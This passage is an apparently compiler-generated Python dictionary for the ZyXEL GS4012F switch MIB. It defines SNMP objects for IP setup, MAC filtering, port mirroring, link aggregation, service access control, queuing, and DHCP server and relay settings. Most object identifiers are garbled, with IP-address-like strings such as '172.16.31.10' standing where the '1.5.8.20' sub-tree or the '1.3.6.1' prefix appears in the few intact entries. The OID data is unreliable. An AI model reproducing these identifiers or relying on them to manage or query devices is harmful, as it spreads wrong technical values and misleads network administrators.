"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"ipSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14",
}, # node
"dnsIpAddress" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.14.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultMgmt" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"in_band" : {
"nodetype" : "namednumber",
"number" : "0"
},
"out_of_band" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"defaultGateway" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"outOfBandIpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.4",
}, # node
"outOfBandIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.4.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"outOfBandSubnetMask" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.4.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"outOfBandGateway" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.4.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"maxNumOfInbandIp" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"inbandIpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6",
"status" : "current",
"description" :
"""""",
}, # table
"inbandIpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1",
"create" : "true",
"status" : "current",
"linkage" : [
"inbandEntryIp",
"inbandEntrySubnetMask",
],
"description" :
"""An entry in inbandIpTable.""",
}, # row
"inbandEntryIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"inbandEntrySubnetMask" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"inbandEntryVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"inbandEntryRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.14.6.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15",
}, # node
"filterTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1",
"status" : "current",
"description" :
"""""",
}, # table
"filterEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1",
"create" : "true",
"status" : "current",
"linkage" : [
"filterMacAddr",
"filterVid",
],
"description" :
"""An entry in filterTable.""",
}, # row
"filterName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterActionState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"discard_source" : {
"nodetype" : "namednumber",
"number" : "1"
},
"discard_destination" : {
"nodetype" : "namednumber",
"number" : "2"
},
"both" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"filterMacAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"filterVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"filterRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.15.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mirrorSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16",
}, # node
"mirrorState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorMonitorPort" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"mirrorTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.3",
"status" : "current",
"description" :
"""""",
}, # table
"mirrorEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.3.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in mirrorTable.""",
}, # row
"mirrorMirroredState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mirrorDirection" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.16.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"ingress" : {
"nodetype" : "namednumber",
"number" : "0"
},
"egress" : {
"nodetype" : "namednumber",
"number" : "1"
},
"both" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.17",
}, # node
"aggrState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"aggrSystemPriority" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"aggrGroupTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3",
"status" : "current",
"description" :
"""""",
}, # table
"aggrGroupEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3.1",
"status" : "current",
"linkage" : [
"aggrGroupIndex",
],
"description" :
"""An entry in aggrGroupTable.""",
}, # row
"aggrGroupIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"aggrGroupState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrGroupDynamicState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.4",
"status" : "current",
"description" :
"""""",
}, # table
"aggrPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.4.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in aggrPortTable.""",
}, # row
"aggrPortGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.17.4.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"t1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"t2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"t3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"t4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"t5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"t6" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"aggrPortDynamicStateTimeout" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.17.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accessCtlSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18",
}, # node
"accessCtlTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1",
"status" : "current",
"description" :
"""""",
}, # table
"accessCtlEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1.1",
"status" : "current",
"linkage" : [
"accessCtlService",
],
"description" :
"""An entry in accessCtlTable.""",
}, # row
"accessCtlService" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"telnet" : {
"nodetype" : "namednumber",
"number" : "1"
},
"ssh" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ftp" : {
"nodetype" : "namednumber",
"number" : "3"
},
"http" : {
"nodetype" : "namednumber",
"number" : "4"
},
"https" : {
"nodetype" : "namednumber",
"number" : "5"
},
"icmp" : {
"nodetype" : "namednumber",
"number" : "6"
},
"snmp" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"accessCtlEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accessCtlServicePort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"accessCtlTimeout" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.18.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"securedClientTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2",
"status" : "current",
"description" :
"""""",
}, # table
"securedClientEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1",
"status" : "current",
"linkage" : [
"securedClientIndex",
],
"description" :
"""An entry in securedClientTable.""",
}, # row
"securedClientIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"securedClientEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"securedClientStartIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"securedClientEndIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"securedClientService" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.18.2.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Bits",
"telnet" : {
"nodetype" : "namednumber",
"number" : "0"
},
"ftp" : {
"nodetype" : "namednumber",
"number" : "1"
},
"http" : {
"nodetype" : "namednumber",
"number" : "2"
},
"icmp" : {
"nodetype" : "namednumber",
"number" : "3"
},
"snmp" : {
"nodetype" : "namednumber",
"number" : "4"
},
"ssh" : {
"nodetype" : "namednumber",
"number" : "5"
},
"https" : {
"nodetype" : "namednumber",
"number" : "6"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"queuingMethodSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.19",
}, # node
"portQueuingMethodTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.19.1",
"status" : "current",
"description" :
"""""",
}, # table
"portQueuingMethodEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.19.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
"portQueuingMethodQueue",
],
"description" :
"""An entry in portQueuingMethodTable.""",
}, # row
"portQueuingMethodQueue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.19.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""0...7""",
}, # column
"portQueuingMethodWeight" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.19.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0...15""",
}, # column
"dhcpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20",
}, # node
"globalDhcpRelay" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.1",
}, # node
"globalDhcpRelayEnable" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"globalDhcpRelayOption82Enable" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.20.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"globalDhcpRelayInfoEnable" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.20.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"globalDhcpRelayInfoData" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"maxNumberOfGlobalDhcpRelayRemoteServer" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"globalDhcpRelayRemoteServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.1.6",
"status" : "current",
"description" :
"""""",
}, # table
"globalDhcpRelayRemoteServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.1.6.1",
"create" : "true",
"status" : "current",
"linkage" : [
"globalDhcpRelayRemoteServerIp",
],
"description" :
"""An entry in globalDhcpRelayRemoteServerTable.""",
}, # row
"globalDhcpRelayRemoteServerIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.1.6.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"globalDhcpRelayRemoteServerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.1.6.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServer" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.2",
}, # node
"maxNumberOfDhcpServers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The maximum number of DHCP server entries that can be created.
A value of 0 for this object implies that there exists settings for
global DHCP relay.""",
}, # scalar
"dhcpServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.2.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"dhcpServerVid",
],
"description" :
"""An entry in dhcpServerTable.""",
}, # row
"dhcpServerVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpServerStartAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerPoolSize" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerMask" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.2.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerPrimaryDNS" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.2.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerSecondaryDNS" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.2.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpServerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.2.2.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpRelay" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3",
}, # node
"dhcpRelayInfoData" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"maxNumberOfDhcpRelay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""The maximum number of DHCP relay entries that can be created.
A value of 0 for this object implies that there exists settings for
global DHCP relay.""",
}, # scalar
"maxNumberOfDhcpRelayRemoteServer" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.3.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"dhcpRelayRemoteServerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.172.16.31.10.20.3.4",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpRelayRemoteServerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "172.16.17.32.4.1.890.1.5.8.20.20.3.4.1",
"create" : "true",
"status" : "current",
"linkage" : [
"dhcpRelayVid",
"dhcpRelayRemoteServerIp",
],
"description" :
"""An entry in dhcpRelayRemoteServerTable.""",
}, # row
"dhcpRelayVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpRelayRemoteServerIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"dhcpRelayRemoteServerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpRelayTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.5",
"status" : "current",
"description" :
"""""",
}, # table
"dhcpRelayEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.5.1",
"status" : "current",
"linkage" : [
"dhcpRelayVid",
],
"description" :
"""An entry in dhcpRelayTable.""",
}, # row
"dhcpRelayOption82Enable" : {
"nodetype" : "column",
